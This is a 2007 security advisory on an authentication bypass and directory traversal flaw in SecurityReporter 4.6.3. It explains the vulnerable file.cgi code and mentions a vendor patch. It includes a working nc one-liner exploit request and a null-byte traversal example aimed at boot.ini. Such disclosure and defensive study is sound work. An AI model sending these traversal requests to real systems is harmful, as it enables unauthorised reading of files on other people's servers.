securityreporter-traverse.txt

2007-07-24T00:00:00
ID PACKETSTORM:57963
Type packetstorm
Reporter Oliver Karow
Modified 2007-07-24T00:00:00

Description

                                        
                                            `SECURITYREPORTER - AUTHENTICATION BYPASS AND DIRECTORY TRAVERSAL  
VULNERABILITY  
  
Product: SecurityReporter  
Version: 4.6.3 Build Date: 04/20/2007  
Platform: Win32  
Vendor: Secure Computing (www.securecomputing.com)  
  
Product Description  
-------------------  
  
"SecurityReporter is a security event analysis and reporting solution  
for the  
Sidewinder Security Appliance, providing realtime security intelligence  
to help  
decipher hacker/virus behavior, combat security threats, and help meet  
compliance requirements."  
  
Vendor Description  
------------------  
  
SecurityReporter is manufactured under an OEM partnership between  
Secure Computing and eIQnetworks. The product is also known as "Network  
Security Analyzer". According to eIQnetworks, Security Analyzer is also  
part of products of the following companies:  
  
- Top Layer Networks  
- Clavister  
- Astaro  
- Reflex Security  
- H3C  
- Piolink  
- MiraPoint  
  
  
Vulnerability-Overview  
----------------------  
  
SecurityReporter is vulnerable to an authentication bypass and directory  
traversal attack.  
It is possible to access files inside and outside the application root  
directory from remote without authentication.  
  
During the installation of SecurityReporter it can be chosen between an  
dedicated Apache installation (which is included within the install  
package) and the usage of an  
pre-installed Internet Information Server.  
  
In case of the Apache, access to the files is executed with local system  
account privileges by default.  
  
  
Exploitation  
------------  
  
The following request fetches the sourcecode of the script itself, but  
can also be used to access any other file on the partition:  
  
echo -e "GET /cgi-bin/file.cgi?name=/eventcache/../cgi-bin/file.cgi  
HTTP/1.0\r\n\r\n" | nc <ip> <port>  
  
  
Vulnerability Details  
---------------------  
  
The authentication can be bypassed because of the following code within  
"file.cgi":  
  
8 $name = $field{'name'};  
9  
10 #for gif images we dont care about authorization so just serve it  
without  
11 #bothering the reporting engine again. See bug: 3676 for  
details.  
12 $dontvalidate = "false";  
13 if ($name =~ /^[a-zA-Z0-9\-\. _\/ ]+\.(gif)$/) {  
14 $dontvalidate = "true";  
15 print "Content-Type: image/gif\n";  
16 binmode STDOUT;  
17 }  
18 elsif ($name =~ /^\/eventcache\//) {  
19 $dontvalidate = "true";  
20 print "Content-Type: text/html\n";  
21 binmode STDOUT;  
22}  
  
If the value of the parameter "name" does not match to line 13 (which  
can be enforced by not requesting a ".gif" file) the condition in line  
18 is checked.  
If the value of "name" does start with the directory "/eventcache/",  
$dontvalidate is set to "true", thus disabling uservalidation.  
  
(addition: the regex in line 13 could be bypassed with null-byte attack  
in older versions of this application, by requesting a file like  
../../../../boot.ini%00.gif. But this is fixed in the current version  
within the file GeneralUtilities.pm which is included to most pl-files)  
  
The directory traversal is possible because there is no normalization of  
the input and filtering of dots and slashes/backslashes within  
"file.cgi":  
  
165 #on windows 2003 IIS the cur dir is the root itself- dont  
know why so we try to open it in  
166 #path relative to root if ../ from cgi-bin fails  
167 open(f, "../$name") or open(f, "$name") or die "File  
($name): $!";  
  
  
PATCH  
-----  
  
All SecurityReporter customers have been sent an email by the venodr,  
describing the vulnerability with a link to a patch.  
  
Discovered  
----------  
  
By Oliver Karow (oliver.karow@gmx.de) on Tuesday, 05. June 2007  
http://www.oliverkarow.de/research/securityreporter.txt  
  
  
`